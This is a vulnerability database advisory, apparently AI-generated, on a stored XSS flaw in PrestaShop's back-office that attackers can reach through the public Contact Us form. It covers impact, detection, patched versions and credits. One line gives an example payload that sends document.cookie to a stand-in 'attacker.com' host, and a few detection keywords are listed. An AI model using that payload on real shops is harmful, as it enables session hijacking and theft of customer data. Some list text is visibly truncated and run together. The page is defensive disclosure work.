
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-44212 is a stored Cross-Site Scripting (XSS) vulnerability in the PrestaShop back-office Customer Service view, classified as Critical severity. An unauthenticated attacker can submit the public Contact Us form with a malicious email address; the payload is persisted in the database and executes when a back-office employee opens the affected customer thread. Affected versions are PrestaShop < 8.2.6 and >= 9.0.0-alpha.1, < 9.1.1. The vulnerability was published by matthieu-rolland on May 4, 2026, and added to the GitHub Advisory Database on May 8, 2026. It carries a CVSS v3.1 base score of 9.3 (Critical) (GitHub Advisory, PrestaShop Advisory).
The root cause is improper neutralization of user-controllable input before it is rendered in a web page (CWE-79). The attack vector is network-based with low complexity and requires no authentication — an attacker submits the publicly accessible Contact Us form with a crafted malicious payload embedded in the email address field. The payload is stored in the PrestaShop database and is later executed in the browser context of a back-office employee when they navigate to the affected customer service thread, triggering the stored XSS. The changed scope metric reflects that the vulnerability in the front-end input crosses into the privileged back-office context (GitHub Advisory, PrestaShop Advisory).
Successful exploitation enables session hijacking of back-office employee accounts and full back-office takeover, giving attackers administrative control over the PrestaShop e-commerce platform. This can result in theft of sensitive customer data (orders, payment information, personal details), unauthorized modification of store configuration, and potential installation of malicious code or backdoors. The confidentiality and integrity impacts are both rated High, while availability is not directly affected (GitHub Advisory).
No public proof-of-concept exploit code or in-the-wild exploitation has been confirmed at the time of disclosure. The EPSS score is approximately 0.022% (6th percentile), indicating a currently low probability of exploitation within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the zero-authentication requirement and the straightforward attack vector (public contact form) make this relatively easy to weaponize against any unpatched PrestaShop instance (GitHub Advisory).
attacker+<script>document.location='https://attacker.com/steal?c='+document.cookie</script>@example.com, designed to execute JavaScript when rendered in the back-office.POST /contact-us or equivalent) with anomalous or encoded content in the email field; back-office access logs showing admin actions performed from unfamiliar IP addresses following thread views.<script>, javascript:, onerror=, onload=).PrestaShop has released patched versions 8.2.6 (for the v8 branch) and 9.1.1 (for the v9 branch), which address this vulnerability. No configuration-based workarounds are available — upgrading to a patched version is the only remediation. Store operators should prioritize upgrading immediately, and in the interim, restrict back-office access to trusted IP addresses and advise employees to avoid opening customer service threads from untrusted submissions until patched (GitHub Advisory, PrestaShop Advisory).
The vulnerability was discovered and reported by Savio at Doyensec in collaboration with Anthropic Research, reflecting an emerging trend of AI-assisted security research contributing to CVE discovery (GitHub Advisory). Community discussion appeared on Reddit's r/pwnhub, where the flaw was highlighted as a critical stored XSS enabling back-office takeover. Coverage was also picked up by The Hacker Wire and security aggregators including VulDB and InfinitSec, noting the zero-authentication requirement as a particularly concerning aspect for e-commerce operators.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."